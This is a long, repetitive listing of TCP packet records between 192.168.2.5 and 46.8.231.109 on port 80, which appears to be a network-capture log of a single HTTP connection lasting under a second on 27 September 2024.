Sep 27, 2024 00:15:06.372823000 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.372831106 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.372854948 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.372862101 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.372895956 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.372905970 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.372937918 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.372951031 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.372970104 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.372983932 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.373002052 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.373020887 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.373051882 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.373054028 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.373097897 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.373100996 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.373132944 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.373146057 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.373162031 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.373176098 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.373193026 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.373208046 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.373226881 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.373239040 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.373258114 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.373271942 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.373291969 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.373306990 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.373322964 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.373330116 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.373354912 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.373368025 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.373387098 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.373400927 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.373421907 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.373431921 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.373454094 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.373471022 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.373486996 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.373502016 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.373518944 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.373531103 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.373552084 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.373559952 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.373584032 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.373619080 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.373619080 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.373632908 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.373665094 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.373677969 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.373696089 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.373724937 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.373744011 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.373747110 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.373776913 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.373792887 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.373807907 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.373831034 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.373838902 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.373850107 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.373878002 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.373887062 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.373919964 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.373929977 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.373953104 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.373964071 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.373986006 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.374017000 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.374043941 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.374049902 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.374058008 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.374082088 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.374092102 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.374116898 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.374123096 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.374147892 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.374161005 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.374181032 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.374193907 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.374213934 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.374232054 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.374249935 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.374263048 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.374283075 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.374314070 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.374315023 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.374326944 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.374346972 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.374361992 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.374377966 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.374391079 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.374409914 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.374443054 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.374449015 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.374455929 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.374470949 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.374494076 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.374501944 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.374516964 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.374535084 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.374551058 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.374577045 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.374583960 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.374619007 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.374629021 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.374650955 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.374680042 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.374684095 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.374696016 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.374722958 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.374731064 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.374762058 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.374775887 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.374795914 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.374808073 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.374828100 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.374857903 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.374860048 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.374866962 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.374891996 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.374897957 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.374922991 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.374936104 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.374955893 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.374968052 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.374988079 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.375000000 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.375020981 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.375029087 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.375051022 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.375056982 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.375082970 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.375091076 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.375114918 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.375124931 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.375149965 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.375154018 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.375183105 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.375195026 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.375216961 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.375227928 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.375247955 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.375261068 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.375282049 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.375296116 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.375313997 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.375322104 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.375345945 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.375355005 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.375375986 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.375392914 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.375416994 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.458317041 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.458350897 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.458420038 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.458439112 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.458470106 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.458471060 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.458534956 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.458579063 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.458630085 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.458645105 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.458645105 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.458645105 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.458645105 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.458672047 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.458673000 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.458713055 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.458719015 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.458750963 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.458766937 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.458782911 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.458796978 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.458826065 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.458832026 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.458863020 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.458873987 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.458895922 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.458908081 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.458929062 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.458942890 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.458966017 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.458976984 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.458995104 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.459009886 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.459026098 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.459038973 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.459058046 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.459072113 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.459091902 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.459108114 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.459125996 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.459132910 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.459156990 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.459172964 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.459188938 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.459201097 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.459222078 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.459233046 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.459254980 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.459261894 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.459284067 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.459295034 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.459315062 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.459328890 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.459346056 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.459353924 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.459378004 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.459408045 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.459423065 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.459427118 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.459459066 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.459471941 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.459491968 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.459503889 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.459523916 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.459532976 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.459557056 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.459564924 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.459592104 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.459598064 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.459625006 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.459638119 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.459661961 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.459672928 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.459695101 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.459702969 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.459722996 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.459734917 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.459762096 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.459770918 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.459801912 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.459810019 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.459830999 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.459841967 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.459862947 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.459877014 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.459894896 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.459908962 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.459925890 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.459935904 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.459958076 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.459969997 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.459990978 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.459994078 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.460024118 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.460037947 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.460055113 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.460067987 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.460088968 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.460098982 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.460120916 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.460131884 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.460153103 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.460160971 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.460197926 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.460201025 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.460243940 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.460252047 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.460283995 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.460298061 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.460315943 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.460326910 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.460346937 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.460362911 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.460380077 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.460387945 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.460412979 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.460429907 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.460454941 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.460460901 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.460483074 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.460491896 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.460509062 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.460522890 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.460535049 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.460556030 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.460567951 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.460587025 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.460598946 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.460619926 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.460630894 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.460652113 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.460666895 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.460690975 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.460701942 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.460730076 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.460738897 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.460767984 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.460779905 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.460819960 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.460828066 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.460850954 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.460859060 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.460884094 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.460887909 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.460916042 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.460925102 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.460948944 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.460954905 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.460990906 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.461014032 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.461055994 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.461276054 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.461322069 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.461324930 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.461357117 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.461379051 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.461395025 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.461400986 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.461426973 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.461435080 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.461458921 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.461469889 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.461492062 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.461505890 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.461522102 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.461538076 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.461563110 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.461736917 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.461765051 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.461781979 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.461812019 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.461834908 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.461843014 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.461850882 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.461875916 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.461884975 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.461909056 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.461915016 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.461954117 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.461966038 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.462006092 CEST	49708	80	192.168.2.5	46.8.231.109
